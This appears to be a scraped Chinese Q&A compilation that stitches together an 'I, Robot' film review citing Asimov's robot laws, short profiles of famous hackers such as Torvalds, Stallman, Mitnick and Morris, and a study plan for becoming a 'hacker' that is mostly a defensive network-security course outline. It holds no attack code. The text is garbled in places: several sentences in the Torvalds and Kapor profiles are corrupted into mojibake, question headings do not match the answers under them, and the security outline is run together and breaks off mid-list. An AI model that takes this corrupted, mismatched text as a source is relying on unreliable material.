本文目录一览:
- 1、寻找一部电影的名字!
- 2、找一些著名黑客的故事!
- 3、黑客是怎样练成的?给10分
- 4、如何变成黑客
寻找一部电影的名字!
机械公敌影评2007-04-10 23:35科幻大师阿西莫夫--划时代的机器人三大安全法则:
LAW I A robot may not injure a human being or,through inaction,allow ahuman being to come to harm.
LAW II A robot must obey orders given it by human being except where such orders would conflict with the first law.
LAW III A robot must protect its own existence as long as such protection does not conflict with the first second law.
1. 机器人不能伤害人类,或坐视人类受到伤害而袖手旁观。
2. 除非违背第一法则,机器人必须服从人类的命令。
3. 在不违背第一和第二法则前提下,机器人必须保护自己。
在科幻题材的作品里探讨哲学和道德命题是电影人为之痴迷的工作之一,有太多的大师级导演都曾涉足过这一领域,并留下诸多佳作。斯坦利.库布里克的《2001太空漫游》、莱德利.斯科特的《银翼杀手》以及斯匹尔伯格的《AI》都是影迷们津津乐道的名片。《机械公敌》传承了这类作品独有的思辨深度,整合了前辈们留下的成功技法,活像一本科幻片新编教科书似的。唯一的区别是前辈们的理论往往深邃的犹如博士论文,而这部深入浅出的影片却非常容易“消化吸收",它不仅不晦涩,反而轻松愉悦地犹如阅读儿童文学。
所以,你若抱着激荡心智或者感悟哲理的目的来欣赏该片,一定会有种很不过瘾的遗憾。但是,以一部纯娱乐片的标准去衡量,《机械公敌》绝对是超额完成了任务。影片本身所蕴涵的思想深度已经达到或接近娱乐片的极限,若再跨一部必然会破坏整部作品的平衡。我相信拥进影院去捧场的观众没有几个会在意本片那略显含混的剧情走向,(机器人三大安全法则为何就是导致其进化并产生独立意识的根源呢?)多数人关心的只是影片拍的是否足够“眩",从这点来看,《机械公敌》几乎是无懈可击的。
一个酷爱科幻题材的影迷不可能没接触过《黑客帝国》系列片,而一旦你同时欣赏过那套集合了众多动漫界高手所摄制的《黑客动画版系列片》,那么,将《机械公敌》与《黑客帝国》放到一起进行比较则是很自然的联想。一个多月前当我初次接触到预告片时,就惊诧于《机械公敌》与黑客影片那千丝万缕的联系。夸张点说,本片将黑客系列片只在动画版中展现过的前传给搬上了大银幕,(当然,准确的说只是整部前传内容的1/4而已。)它高度遵从了“黑客思想"的脉络,将人工智能的进化,失控,以及机器与人类间生存的矛盾揭示的有条不紊。
但是,《机械公敌》并没有沿着这条思考之路走向幽深的哲学领域,而是蜻蜓点水般的触动了一下那些思想的边缘,旋即展开精彩纷呈的冒险之旅。即便在最能体现深度的桥段里,影片都在努力借用诙谐的元素来“中和"深奥主题带给人的困顿,通篇几乎没有一段无谓的说教,反倒是包含机锋的黑色幽默与充满颠覆意味的调侃贯穿始终。其实本片在序幕部分就在暗示其主题的轻松,三段阿西莫夫的安全法则依次出现于银幕之上,又都如气泡般消弭于无形。这里虽然是配合主人公回忆中的一个场景再现,却正好无意中契合了整部作品解构的风格。
进一步来看,两部影片的差异更为明显。黑客系列片让人类与机器间的生存之争演变成一场宿命般的死循环,悲凉的气息如同一副挣脱不开的心灵镣铐。而《机械公敌》却没有这么悲观,它仍然为故事设定了一个颇为光明的结局。最终也没有逃离出英雄主义题材惯常手法的窠臼。所以说黑客帝国应该是一套借用诸多娱乐元素成功包装的小众文艺片,超高的人气和票房多少有些无心插柳的运气成分。《机械公敌》则恰恰相反,深刻绝不是它追求的终极目标,因为思考只是辅佐故事推进的一件工具而已,娱乐才是这部影片的精髓所在。一个强有力的证据是本片选择了威尔.史密斯来扮演主人公史普纳,并非是指威尔自身的明星效应符合娱乐片的一贯选择,而是这个演员身上独特的气质简直成了这部影片的最佳调味剂。
说史普纳这个角色是为威尔.史密斯量身定做的一点也不夸张,威尔身上的叛逆与玩世不恭特质早已不止一次的出现在他所塑造的人物身上。从《绝地战警》到《独立日》再到《黑超特警组》,威尔那平民化的表演方式使他的银幕形象在酷的同时显出难能可贵的亲和力。回到《机械公敌》来看,主人公史普纳的个性虽有其独特之出,却与威尔曾经扮演过的经典角色有90%的重叠之处,演绎起来当然毫不费力。为了更好的彰显演员身上这种特有的优势,并“利用"其来为影片服务,编导甚至扫平了所有阻遏演员发挥的障碍,充分借助了以往影片成功的桥段设计。若一点一点的搜集出这些细节来,你会发现本片几乎就是对科幻片集体成就致敬式的作品。
主人公史普纳是生活在2035年芝加哥的嬉皮士,他痛恨科技的进步,对智能机器人这一新生的群落保持着高度的警惕心,警察的身份使他更容易将自己的这种“偏见"付诸行动。影片将他与时代的心理落差精确的定位在我们眼下的生活,为的是便于观众更容易接纳其怪异举止。(好比现在身边有朋友喜欢穿长衫、马褂,坚持用毛笔写信,也只有在清末民初的那个年代里最容易找到知音了。)最有意思的是影片设定了一个主人公邮购球鞋的细节,干脆直截了当的指出鞋子的生产日期是2004年,这就几乎是在赤裸裸的宣告主人公与现今社会的步调保持了高度一致。
为了解释史普纳非同常人的思维习惯的合理性,(相对于2035年的人而言)影片为其安排了三段痛苦记忆的闪回。这完全属于俗套的范畴,不过影片在后面以提升故事思考深度的方式升华了这段回忆,并以一种质询的口吻将“皮球"踢到了观众这边,也算得上是一种颇有创意的结构。更重要的事,它间接起到了消融男女主人公之间的误会,让彼此产生朦胧情愫的关键作用。对了,《黑超特警组》也为威尔安排过一个靓丽的女配角,同样也有个心生误解到患难之交的情感历程。
其实《机械公敌》这部影片的黑色基调非常明显,并非是指影片大多数场景都放在了阴暗的地点,而是整部作品不时显露出一种冷酷的凝重感来。虽然威尔.史密斯那亦庄亦谐的表演在很大程度上软化了这种气氛,不过编导总在有意无意间将整个故事引向一种让人思索的境地,这种感觉在影片表现NS-5机器人时显得尤为明显。
本片没有简单的抄袭以往科幻片中将智能机械统统归为恐怖符号的手法,而是赋予了这个新的群体一种人性化的特征。机器人索尼原本是故事推动的一个线索,套用影片里的说法,就是教授指引主人公破译真相的“面包渣"而已。可本片对其塑造远远超越了一般意义上的机器人,更多的时候你几乎无法分辨这个角色与真人之间的区别,到了影片最后,索尼甚至达到了能与威尔分庭抗礼的地步。影片《AI》也做过将机器人拟人化处理的尝试,但哈瑞.乔.奥斯蒙德的角色本身已经让人感觉不到有多少机械的意味,而索尼却还保持着纯粹的机器人特征(从特效的制作难度来看,仅索尼一个角色就可将整部作品里所有惊险万分的打斗场景给比下去。)
与索尼不同的是,他的“同类"NS-5,以及更老一代的产品NS-4全都显露出一种精确且冷酷的特质来。索尼是唯一一个没有受制于三大安全法则的机器人,但他却最有灵性,最能理解人类内心所特有的情感。影片并没有去解释造成这个现象的原因,它只是隐约让你感受到一种反讽的辛辣意味。受到禁锢和奴役的心灵必然是干涸的,也必然是残酷无情的,这一点透过机器人来反映似乎更让人心惊。当我看到影片里那幕机器人相互屠戮的场景时,一种末世的无助感迅速浸满全身。而这种感觉是以往看娱乐片时从未有过的。
影片《机械公敌》分别在52分钟和结尾处安排了两场精彩纷呈的动作戏。前一段是公路追逐战的标准模版,后者则非常聪明的借助了摄影的技巧让整场戏看起来有种眩晕的快感。这是意料之中的,或者说是这类影片必须拍出来不然就不称职的戏份。让我感到“意外"的地方并不在这里,而是那些未曾料到的包袱。
罪魁祸首VIKE电脑主机的一番辩解让人回忆起《黑客帝国》里施密斯特工的人类归属论。这个纯靠电脑制作的抽象角色居然一点也不乏味,反而处处透着一股神秘,较之很多真人配角还要有立体感,而影片那看似功德圆满的结局其实也隐隐透着点开放式的内涵。机器人已经被激发出的独立意识将何去何从?人类如何调整彼此间的关系?这些问题都不可能用主人公史普纳与索尼那冰释前嫌的一个握手就匆匆了结掉。
虽然也可以将这样的结尾方式看作是为续集埋下伏笔,正如阿西莫夫的机器人三大安全法则一样,既可以被当作是人类驾驭人工智能的完美程序,换个角度来想,也可以是人类自私与胆怯的有力佐证。所以,我更愿意将影片《机械公敌》的结尾看作是编导在出色完成本职任务后的一次“放纵"。如果前面所有的思索全是为了提升影片的娱乐指数,那这最后的一幕就彻底让位于心灵火花的绽放吧。当机器人索尼站在山峰上鸟瞰自己同类的眼神被涂上一层迷惘的色彩时,我相信此时沉淀在观众内心的感悟绝不止是娱乐过后的快感。
“《机械公敌》最吸引我的是,它的中心概念是机器人没有问题,科技并不是问题本身,人类逻辑的极限才真的是问题,而最终,我们成为自己最大的敌人。”这是威尔·史密斯出演该片的最大体会。
NS-5基本资料
高度180公分,耐久钛金属外壳,具456个活动零件,需经由12位博士组装完成,熔点华氏六千度,可负重800磅,能承受数千磅撞击。电子智慧脑可复制人类自由意志,具有1TB内存,每秒能执行6兆笔以上运算,拥有80种语言能力。
找一些著名黑客的故事!
世界十大黑客
十大超级老牌黑客之:李纳斯
Linux这部史诗发端于赫尔辛基。似乎天下的黑客都在为自己的生命创作源程序,李纳斯也不例外。他的家就在离市中心不远的Kalevagatan(与卡勒瓦拉很相近)大街。这是一个19世纪的建筑与现代化平房交相呼应的地方。李纳斯与妻子住在这里。他的家很像是大学生的集体宿舍,楼梯下总放着一排排自行车。
李纳斯本人看起来就像一名学生,而不像道士。他中等身材,浅褐色头发,蓝眼睛,目光透过镜片直直地射向你,只有浓密的眉毛是黑色的,衬着一张孩子气的脸庞。他的房间四周排列着许多书籍,里面布满了油画和各种装饰品,相当低廉的窗帘,两把扶手椅之间挂着发干的鳄鱼皮,房间里还有两只目空一切的猫和几台计算机:三台PC,一台Power Mac,还有三台从DEC借来的基于Alpha芯片的微机。它们不起眼地布置在房间的角落中。另外一样很有意思的东西不易察觉:那是一根将计算机连到缁安遄�牡枷撸�馐峭ㄏ蚧チ��?56K的专线,由当地的一家ISP安装并承担费用,它是对这位Linux道士的象征性奖励。
主要成就:好像是谈论梦想,又好像是“X档案”中的一段情节。一个21岁的芬兰大学生,在学生宿舍里写了一个操作系统的内核--Linux,然后公布于众,吸引了成千上万的程序员为之增补、修改和传播,短短几年就拥有了1000多万的用户,成为地球上成长最快的软件。李纳斯.托沃兹(Linus Torvalds),当今世界最著名的电脑程序员、黑客。Linux内核的发明人及该计划的合作者。托瓦兹利用个人时间及器材创造出了这套当今全球最流行的操作系统内核之一。使自由软件从产业思想运动演变成为市场商业运动,从此改变了软件产业,乃至IT产业的面貌。
十大老牌黑客之:沃兹尼克
在硅谷,一个人要赢得好名声远比赢得大把的钱财要困难得多。因为财富是声名鹊起的基本条件。而要赢得财富,就必须勾心斗角,逐利而去。因此无论是苹果的乔布斯、Oracle的埃里森还是英特尔的葛鲁夫,都只能在当地获得毁誉参半的名声。但是,如果在硅谷还有唯一一位大家公认的“好人”,那么这个人肯定非沃兹莫属。
这位当年的技术天才,淡泊名利,性格纯朴,早早离开了热闹的中心。这也注定了他必然与计算机业沿着不同的路线,书写各自的历史。现在,昔日的战友乔布斯又在叱诧风云,而他则过着自己安静的生活。
十大超级老牌黑客:丹尼斯.利奇和肯.汤普生
不可思议的是,当初这个操作系统的诞生,并不是为了把它推向市场,甚至不是为了让更多人使用,而仅仅是作者为了便于自己使用,而且初衷是为了自己更方便地玩游戏。连Unix这个别扭的名字,也是对早期一个名为Multics操作系统开玩笑的称呼。在后来的获奖答谢中,作者之一的丹尼斯.里奇坦然说:“我们的目的是为自己建立一个良好的计算机工作环境,当然也希望大家都能喜欢它”。
然而,在这不经意间,奇迹诞生了,再一次验证了IT业的创新往往是兴趣,而不是大把大把的金钱使然。经过10年的内部使用,于70年代中期开始。Unix第一次公诸于世,就慢慢走向成功,震动整个计算机业。1969年开始工作时,里奇和汤普生根本没有想过要掀起业界的狂热,在1974年以前,他们甚至没有发表过任何关于项目的消息。而当Unix露面时,他们还惊奇于会引起如此大的兴趣。他们并没有积极推销,大学、研究机构可以免费使用,而且还提供源代码。
主要成就:贝尔实验室著名的计算机科学工作组的创造力的推进剂。里奇和汤普森在1969年创造了UNIX, UNIX是小型机上的一个一流的开放操作系统,它能帮助用户完成普通计算、文字处理、联网,很快成为一个标准的语言。
鲜为人知的事实:由汤普森和他的贝尔实验室的同事罗布.派克(Rob Pike)创造的Plan 9,是由UNIX衍生的下一代操作系统
十大老牌黑客之:斯托曼
主要成就:老牌黑客。1971年,斯托曼在街上找到一份MIT的人工智能实验室的工作。当时他是哈佛大学的一名本科生。后来,斯托曼创立了自由软件基金,打破了软件是私有财产的概念。
第一次接触计算机:1969年在IBM纽约科学中心,时值16岁。自己独特的黑客工具:在上世纪80年代,斯托曼不拿MIT的薪水但继续在其中的一个办公室工作。在那里他创造了一个新的操作系统GNU--GNU是"GNU’s Not Unix"的缩写。鲜为人知的事实:曾获得麦克阿瑟基金24万美元天才奖。
十大老牌黑客之:约翰.德拉浦
主要成就:发现了使用(“嘎吱嘎吱船长”牌的)麦片盒里作为奖品的哨子(向电话话筒吹声)可以免费打(长途)电话。Cap’n Crunch给几代黑客引入了“盗用电话线路”打(长途)电话的辉煌思想。
第一次接触计算机:青少年时期,试图使投币式公用电话确信得到他的硬币和接通他的电话。
自己独特的工具:嘎吱嘎吱船长牌的麦片盒里的玩具口哨,能够产生2600赫兹的音调,这是(让电话系统)开启一个(电话)呼出的蓝匣子(用这种装置侵入电话系统),用户就也可以免费地打(长途)电话。(随后的奥斯卡梅耶韦纳Oscar Meyer weiner口哨也曾一度获得电话飞客们的青睐)
十大超级老牌黑客之:米特尼克
主要成就:他是第一个在美国联邦调查局“悬赏捉拿”海报上露面的黑客。他由于只有十几岁,但却网络犯罪行为不断,所以他被人称为是“迷失在网络世界的小男孩”。
米特尼克的圣诞礼物来自联邦通信管理局(FCC)。FCC决定,恢复米特尼克的业余无线电执照。从13岁起,无线电就是米特尼克的爱好之一。现在,他仍然用自制电台和朋友通话。他认为,正是这一爱好引发了他对计算机黑客这个行当的兴趣。不过,这份执照恢复得也并不轻松,他必须交付高达16,000美元的罚款。“这是世界上最贵的一份业余无线电执照,米特尼克说,‘不过我仍然很高兴。’”
十大超级老牌黑客之:雷蒙德
任何一场革命或者运动都需要一个理论家,需要一份纲领性的文献,起到真正的“画龙点睛”的神效。除了架构极具思辩力和逻辑性的理论体系,更需要激发起人们对美好理想的向往,为同行者的士气传递极具煽动性的烈焰。目前,这场正在颠覆软件业传统商业模式的自由软件运动也不例外。自由软件精神领袖当然是理查德.斯托尔曼(Richard Stallman),但他太超凡脱俗,而且,除了提出核心理念外,斯托尔曼缺乏著书立作的能力。这些局限,使得埃里克.雷蒙德(Eric S. Raymond)脱颖而出,担当了这个角色。如今,他已经成为开放源代码运动(脱胎于自由软件运动)和黑客文化的第一理论家,不可动摇。
雷蒙的策略获得了很大的成功。一般认为,1998年Mozilla的发布主要归功于他。大多数黑客和主流观察家也同意,正是雷蒙将开放源代码的理念成功地带到了华尔街。但是也有批评他的声音:有一些黑客认为他利用这些机会为自己打广告,而他对理查德.斯托曼和自由软件基金会的理想主义所进行的批评,以及所采取的更务实、更符合市场口味的线路,也曾经在黑客社群里掀起了不小的政治对立。
十大超级老牌黑客之:卡普尔
1971年,卡普尔从耶鲁大学毕业。在校期间,他专修心理学、语言学以及计算机学科。也就是在这时他开始对计算机萌生兴趣。他继续到研究生院深造。20世纪60年代,退学是许多人的一个选择。只靠知识的皮毛,你也能过日子。那些年里,卡普尔1年可以挣1.2万美元。他漫无目标地在游荡,正如他后来描绘自己这一时期的生活时所说,他成了一个“有知识的吉普赛人”。
主要成就:在80年代中期,卡普尔与盖茨是美国软件业的双子星。1982年创办Lotus公司,并担任CEO。推出个人电脑“杀手级应用”软件Lotus1-2-3,1985年,Lotus员工已达千人,是当时最大的独立软件公司。直到1988年4月,微软才超过Lotus,成为头号软件公司。卡普尔发起创办的电子边疆基金会(EFF),维护黑客利益,被称为是计算机业的美国公民自由协会(ACLU)。卡普尔也因此成为80年代和90年代最具影响力的计算机人物和黑客界最具影响力的人物之一。
卡普尔是硅谷黑客理念的真正体现:反对公司、不裱�髁骶�瘛⒏挥写丛臁⒊缟谐鍪馈8谴脑蚴窍执�诳偷奶逑郑�肟ㄆ斩�纬上拭鞫哉铡8谴氖欠椿�降男は瘢���郧浚��秩胧溃�非罄�妫��墓�疽惨匝怪谱杂啥�晒Γ�霾�舐�⒈孔尽⒋看庖陨桃登��牟�贰S胨�啾龋�ㄆ斩��且晃幻窦涞挠⑿邸6�谴脑蚴侵髁魃缁岬挠⑿邸?/P
十大超级老牌黑客:莫里斯
主要成就:这位美国国家计算机安全中心(隶属于美国国家安全局NSA)首席科学家的儿子,康奈尔大学的高材生,在1988年的第一次工作过程中戏剧性地散播出了网络蠕虫病毒后,“Hacker”一词开始在英语中被赋予了特定的含义。在此次的事故中成千上万的电脑收到了影响,并导致了部分电脑崩溃。
第一次接触计算机:在家里。莫里斯的父亲曾从NSA带回把一台原始的神秘的密码机器到家里。它成为一家人的谈资。
1988年冬天,正在康乃尔大学攻读的莫里斯,把一个被称为“蠕虫”的电脑病毒送进了美国最大的电脑网络--互联网。1988年11月2日下午5点,互联网的管理人员首次发现网络有不明入侵者。它们仿佛是网络中的超级间谍,狡猾地不断截取用户口令等网络中的“机密文件”,利用这些口令欺骗网络中的“哨兵”,长驱直入互联网中的用户电脑。入侵得手,立即反客为主,并闪电般地自我复制,抢占地盘。
当警方已侦破这一案件并认定莫里斯是闯下弥天大祸的“作者”时,纽约州法庭却迟迟难以对他定罪。在当时,对制造电脑病毒事件这类行为定罪,还是世界性的难题。前苏联在1987年曾发生过汽车厂的电脑人员用病毒破坏生产线的事件,法庭只能用“流氓罪”草草了事。
1990年5月5日,纽约地方法庭根据罗伯特.莫里斯设计病毒程序,造成包括国家航空和航天局、军事基地和主要大学的计算机停止运行的重大事故,判处莫里斯三年缓刑,罚款一万美金,义务为新区服务400小时。莫里斯事件震惊了美国社会乃至整个世界。而比事件影响更大、更深远的是:黑客从此真正变黑,黑客伦理失去约束,黑客传统开始中断。大众对黑客的印象永远不可能回复。而且,计算机病毒从此步入主流。、
注:匿迹 希望称为第11位
黑客是怎样练成的?给10分
基础:如何去学习·要有学习目标·要有学习计划·要有正确的心态·有很强的自学能力学习目标·1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家?网络黑客等) ·2.自己目前的水平和能力有多高·能简单操作windows2000 ·能简单配置windows2000的一些服务·能熟练的配置Windows2000的各种服务·能熟练配置win2000和各种网络设备联网·能简单操作Linux,Unix,Hp-unix, Solaris中的一种或者多种操作系统·能配置cicso,huawei,3com,朗迅等网络设备·会简单编写C/C++,Delphi,Java,PB,VB,Perl ·能简单编写Asp,Php,Cgi和script,shell脚本·3.必须学会不相信态度,尊重各种各样的能力·不要为那些装模做样的人浪费时间·尊重别人的能力, ·会享受提高自己能力的乐趣. ·在知道了自己的水平和能力之后就要开始自己的目标了·--------安全专家·--------黑客·--------高级程序员·黑客是建设网络,不是破坏网络, 破坏者是骇客; ·黑客有入侵的技术,但是他们是维护网络的,所以和安全专家是差不多的; ·因为懂得如何入侵才知道如何维护·因为懂得如何维护才更要了解如何入侵·这是 黑客与安全专家的联系·但,他们都是在会编程的基础上成长的! ·下面我们开始我们的学习计划! 学习计划有了学习计划才能更有效的学习安全学习计划不奢求对win98有多么精通,我们也不讲解win98如何应用,如何精通,我们的起步是win2000 s erver,这是我们培训的最低标准,你对英语有一定的了解也是必不可少最基础·a.会装win2000,知道在安装的时候有两种分区格式,NTFS与FAT32 及他们的区别,知道win2 000可以在安装的时候分区,格式化硬盘, 可以定制安装,可以定制自己需要安装的一些组件,如果有网络适配器,可以直接加入域中 学习点:NTFS和FAT32分区的不同 各个组件的作用域的定义·b.知道如何开,关机 知道注销的用处·c.知道win2000下面各主要目录的作用 Documents and Settings,WINNT,system32 Progra m Files ·d.知道管理工具里面各个组件的定义·e.学会应用命令提示符cmd(dos) ·f.知道计算机管理里面的各个选项的不通·g.知道win2000强大的网络管理功能·h.能非常熟练的操作win2000 ·i.知道IP地址,子网掩码,网关和MAC的区别进阶·A.配置IIS,知道各个选项的作用·B.配置DNS,DHCP ·C.配置主控制域,辅助域·D.配置DFS ·E.配置路由和远程访问·F.配置安全策略IPSEC ·G.配置service(服务) ·H.配置磁盘管理,磁盘分额·i. 配置RAID(0,1,0+1,5) ·J.路由器的安装与简单配置·K.交换机的安装与简单配置·L.常见的VPN,VLAN,NAT配置·M.配置常见的企业级防火墙·N.配置常见的企业级防病毒软件高级·之前我们学到的是任何一个想成为网络安全专家和黑客基本知识中的一部分·你作到了吗?? ·如果你做到了,足以找到一份很不错的工作! 配置负载均衡·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+负载均衡+ASP(PHP.CGI)+CHECK PIONT(ISA SERVER) · ·配置三层交换网络 · ·配置各种复杂的网络环境·能策划一个非常完整的网络方案 · ·能独自组建一个大型的企业级网络 · ·能迅速解决网络中出现的各种疑难问题结束·在你上面的都学好了,你已经是一个高级人才了,也是我们VIP培训的目标! ·可以找到一份非常好的工作·不会再因为给女朋友买不起玫瑰而发愁了! 安全:导读·系统安全服务(SYSTEM) ·防火墙系统(FIREWALL) ·入侵检测(IDS) ·身份验证(CA) ·网站监控和恢复(WEBSITE) ·安全电子商务(E-BUSINESS) ·安全电子邮件(E-MAIL) ·安全办公自动化(OA) ·Internet访问和监控(AC) ·病毒防范(VIRUS) ·虚拟局域网(VPN) 系统安全服务·系统安全管理·系统安全评估·系统安全加固·系统安全维护·安全技能学习系统安全管理·信息系统安全策略·信息系统管理员安全手册·信息系统用户安全手册·紧急事件处理流程系统安全评估1、系统整体安全分析· 分析用户的网络拓扑结构,以找出其结构性及网络 配置上存在的安全隐患。· 通过考察用户信息设备的放置场地,以使得设备物理上是安全的。· 分析用户信息系统的管理、使用流程,以使得系统 能够安全地管理、安全地使用2、主机系统安全检测· 通过对主机进行安全扫描,以发现系统的常见的安全漏洞。· 对于特定的系统,采用特别的工具进行安全扫描。· 根据经验,对系统存在的漏洞进行综合分析。· 给出系统安全漏洞报告。· 指出各个安全漏洞产生的原因以及会造成的危险。· 给出修复安全漏洞的建议3、网络设备安全检测· 通过对网络进行安全扫描,以发现网络设备的安全漏洞。· 根据经验,对网络设备存在的漏洞进行综合析。· 给出网络设备安全漏洞报告。· 指出各个安全漏洞产生的原因以及会造成的险。· 给出修复安全漏洞的建议。安全系统加固·为用户系统打最新安全补丁程序。·为用户修复系统、网络中的安全漏洞。·为用户去掉不必要的服务和应用系统。·为用户系统设置用户权限访问策略。·为用户系统设置文件和目录访问策略。·针对用户系统应用进行相应的安全处理。安全系统维护·防火墙系统维护,安全日志分析·IDS系统维护,安全日志分析·VPN系统维护,安全日志分析·认证系统维护,安全日志分析·服务器、主机系统,安全日志分析·其它各类安全设施维护及日志分析安全技能培训·网络安全基础知识·网络攻击手段演示和防范措施·防火墙的原理和使用·VPN的原理和使用·漏洞扫描工具的原理和使用·IDS(入侵检测系统)的原理和使用·身份认证系统的原理和使用·防病毒产品的原理和使用·系统管理员安全培训·一般用户安全培训防火墙系统·防火墙的定义·防火墙的分类·包过滤防火墙·应用网关防火墙·状态检测防火墙·一般企业防火墙配置·政府机构防火墙配置·涉密网络保密网关配置·高可用性和负载均衡防火墙系统·高速防火墙系统防火墙的定义·用以连接不同信任级别网络的设备。·用来根据制定的安全规则对网络间的通信进行控制防火墙的分类·包过滤 (Packet Filters) ·应用网关 (Application Gateways) ·状态检测(Stateful Inspection) 包过滤防火墙·包 过 滤 技 术·主要在路由器上实现,根据用户定义的内容(如IP地址、端口号)进行过滤。包过滤在网络层进行包检查与应用无关。· 优 点· 具有良好的性能和可伸缩性。· 缺点· 由于包过滤技术是对应用不敏感的,无法理解特定通讯的含义,因而安全性很差。应用网关防火墙·应用网关技术·第二代防火墙技术,其在应用的检查方面有了较大的改进,能监测所有应用层,同时对应用“内容”(Content Information)的含义引入到了防火墙策略的决策处理。· 优点· 安全性比较高。· 缺点· 1、该方法对每一个请求都必须建立两个连接,一个从客户端到防火墙系统,另一个从防火墙系统到服务器,这会严重影响性能。· 2、防火墙网关暴露在攻击者之中。· 3、对每一个代理需要有一个独立的应用进程或 daemon 来处理, 这样扩展性和支持新应用方面存在问题。检测状态防火墙· 属第三代防火墙技术,克服了以上两种方法的缺点,引入了OSI全七层监测能力,同时又能保持 Client/Server的体系结构,也即对用户访问是透明的。· 防火墙能保护、限制其他用户对防火墙网关本身的访问。· 状态检测技术在网络层截获数据包后交给INSPECT Engine,通过 INSPECT Engine 可以从数据包中抽取安全决策所需的所有源于应用层中的状态相关信息,并在动态状态表中 维持这些信息以提供后继连接的可能性预测。该方法能提供高安全性、高性能和扩展性、高伸缩性的解决方案。入侵检测系统·处理攻击时遇到的典型问题·解决入侵的方法和手段·基于网络的入侵检测·基于主机的入侵检测·入侵检测系统典型配置处理攻击时遇到的问题·获得的信息不足·不知到网络上发生了什么事。·无法判定系统是否已经被入侵。·信息不准确·人员少·没有足够的人员维护管理。·缺乏规范的处理程序·发现攻击时如何反应? ·下一步该如何处理? 解决入侵的方法和手段·采用入侵实时入侵监控系统(IDS)·对系统、网络中发生的事件进行实时监控。·当发生入侵事件时能即时反应。·对入侵事件进行详细记录并跟踪。基于主机的入侵检测·软件模块安装在包含有重要数据的主机上·监视操作系统的日志以发现攻击的特征。·监视代理所处主机上的所有进程和用户. ·监视暴力登录攻击(brute-force login), 试图改变或绕过安全设定,及特权的滥用等。·当新的日志产生时,为了减小对CPU的影响,代理程序暂时中断。基于网络的入侵检测·软件安装在专门的主机上,放置于关键的网段·将配置该软件主机的网卡设置为混杂模式,使得该主机能接受网段上所有的包。·分析数据包以判断是否有黑客攻击。·监视网段上的所有数据。·对网络的流量无任何影响。·能检测到 denial of service attacks, unauthorized access attempts, pre-attack s cans等攻击。身份认证系统·用户身份认证的方法·不同认证方法的安全级别·用户身份认证的常用方式·解决问题的方法·目前比较成熟的双因素认证方法用户身份验证·你知道的一些东西· 密码, 身份证号,生日·你有的一些东西· 磁卡, 智能卡,令牌, 钥匙·你独有的一些东西· 指纹,声音,视网膜密码是不安全的·可以破解密码的工具太多·大多密码在网络中是明文传输的·密码可以网络离线时被窥测·密码和文件从PC和服务器上被转移了·好记的密码容易被猜到,不易猜测的密码又太难记解决方法·使用混合的工具:如IC卡+PIN 网站监控与恢复系统·典型的Web服务器应用·Web服务器存在的安全问题·网站安全解决方法典型web服务器应用·Internet--路由器--防火墙--web站点· | · | · 内部网·所有的放在防火墙后面Web服务器存在的安全问题· 网页被非法篡改是网站内容提供者最头痛的问题。在采用防火墙后,Web服务器本身的漏洞成为了网站被黑的主要问题。· Web应用服务器(如IIS,Apache中存在着大量的安 全漏洞.) · 用户自己开发的CGI、ASP、PHP应用中存在着大量潜在的漏洞。网站安全·采用Web服务器监控与恢复系统·该系统提供对网站文件内容的实时监控,发现被改动后立即报警并自动恢复。电子商务安全系统·典型的电子商务应用·电子商务中存在的安全问题·电子商务的安全解决方法·实时数据交换系统典型电子商务应用·Internet---防火墙---Web服务器· || | · || | · 内部网(数据库) 电子商务中存在的安全问题·1、Web服务器端·Web应用服务器(如IIS、Apache中存在着大量的安全漏洞。用户自己开发的CGI、ASP、PH P应用中存在着潜在的漏洞。· 黑客通过这些漏洞攻击Web服务器,可非法篡改网页,造成恶劣影响,动摇了电子商务使用者的信心。· 甚至可获得Web服务器上大量的敏感资料,如用户的信用卡号,用以连接内部数据库的帐号和口令。· 可能通过控制Web服务器,来攻击内部数据库。电子商务中存在的安全问题·2、SSL协议·SSL加密强度低。由于浏览器默认的加密模块只支持40位的低强度加密,而且即使在浏览器中安装更高位的加密模块,由于WEB服务器不提供对高位SSL链接的支持同样无法实现高强度SSL加密链接。· 无法解决电子商务中的用户签名。SSL链接建立WEB服务器和用户浏览器之间的安全通道只能保证在安全通道内的信息不被窃听或篡改,并不能对用户发送的信息进行签名以保证信息的有效性和不可抵赖性,而这正是电子商务中必须解决的问题。电子商务的安全解决方法·将WEB服务器分为两部分:一般内容的WEB服务器和交易WEB服务器。· 一般内容的WEB服务器放置在DMZ区内,采用WEB站点监控和恢复系统保护,防止主页被非法改动。· 交易WEB服务器放置在内部网内,通过一台物理分隔的实时数据交换系统将其与DMZ区相连。· 在客户机和服务器端安装SSL代理,从而获得128位的高强度加密通道实时数据交换系统·将系统外部 Web服务器和内部应用Web服务器物理隔开. ·外部Web服务器用于存放一般的信息,内部Web服 务器用于存放敏感信息,并和内部数据库连接。·外部用户通过http访问位于DMZ区内的一般Web服务器。·当进行交易时,用户需访问位于内部网内的应用服务器。·https连接首先到达实时数据交换系统的虚拟外部Web服务器,实时数据交换系统将https 协议解开,只将https连接的数据内容拷贝到虚拟内部Web服务器,虚拟内部Web服务器将使用该数据重新发起https连接到实际的内部应用Web服务器. ·内外通过实时数据交换系统进行数据交换,无任何协议和连接穿过实时数据交换系统。·即使DMZ区的Web服务器受到攻击, 攻击者也的不到任何有用的信息安全电子邮件系统·电子邮件的安全问题·安全电子邮件的解决方法·一个安全邮件的使用过程电子邮件的安全问题·如何保证发送的敏感信息不被泄漏·如何保证发送的信息不被篡改·如何确认发件人的真实身份·如何防止发件人的抵赖行为安全电子邮件的解决方法·将PKI体系应用到邮件系统中·邮件的加密和解密以实现数据的保密。·邮件的数字签名(鉴别)实现发件人认证和不可抵赖。·完整性校验功能防止信息传输过程中被篡改可靠的安全性。·采用公开密钥和对称密钥相结合的密钥体系。·支持128bit对称密钥算法和1024bit公开密钥算法。办公自动化系统的安全问题· 如何保证发送的敏感信息不被泄漏· 如何保证发送的信息不被篡改· 如何确认发件人的真实身份· 